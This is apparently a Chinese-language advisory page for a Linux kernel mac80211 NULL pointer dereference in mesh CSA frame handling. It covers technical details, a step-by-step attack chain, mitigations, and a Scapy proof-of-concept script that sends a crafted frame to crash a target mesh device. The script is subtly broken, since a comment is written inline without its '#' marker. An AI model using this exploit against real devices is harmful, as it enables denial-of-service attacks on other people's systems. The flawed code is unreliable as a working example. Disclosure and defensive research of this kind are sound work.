CVE-2026-23396 CVSS 5.5 中危

CVE-2026-23396 Linux内核mac80211空指针解引用漏洞

披露日期: 2026-03-26

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-23396

漏洞类型

空指针解引用

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核的mac80211组件存在安全漏洞，`mesh_matches_local`函数在处理CSA帧时未检查空指针，导致本地攻击者可发送特制帧造成内核崩溃。

技术细节

漏洞位于`net/mac80211/mesh.c`的`mesh_matches_local`函数中。该函数无条件解引用`ie->mesh_config`。虽然大部分调用者在调用前检查了该指针，但`mesh_rx_csa_frame`未进行检查。攻击者可发送包含有效Mesh ID IE但缺少Mesh Configuration IE的CSA action frame，导致`ie->mesh_config`为NULL。函数调用时触发空指针解引用，引发Kernel Panic，导致拒绝服务。

攻击链分析

STEP 1

侦察

识别启用了Linux内核Wi-Fi Mesh功能的设备。

STEP 2

构造恶意帧

构造包含有效Mesh ID IE但故意省略Mesh Configuration IE的CSA Action Frame。

STEP 3

发送攻击包

通过无线接口在本地或相邻范围内将特制帧发送给目标设备。

STEP 4

触发漏洞

目标内核解析帧时，`mesh_matches_local`函数解引用空指针，导致系统崩溃（DoS）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC: Crafted CSA frame to trigger NULL dereference
# Tool: Scapy
from scapy.all import *

def send_exploit():
    target = "AA:BB:CC:DD:EE:FF" # Target Mesh BSSID
    iface = "wlan0mon"
    
    # RadioTap / Dot11 Header
    pkt = RadioTap() / \
           Dot11(type=0, subtype=13, addr1=target, addr2="11:22:33:44:55:66", addr3=target) / \
           bytes([0x0D, 0x03]) / Category: Mesh, Action: CSA

    # Include Mesh ID IE (ID 114), OMIT Mesh Configuration IE (ID 113)
    pkt /= Dot11Elt(ID=114, info="meshid")

    sendp(pkt, iface=iface, count=1)
    print("Packet sent.")

影响范围

Linux Kernel (Stable branches before patch)

防御指南

临时缓解措施

建议立即更新Linux内核以修复此空指针解引用漏洞。若暂时无法更新，应限制对无线网络的物理访问权限，或考虑禁用802.11s Mesh组网功能以阻断攻击路径。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表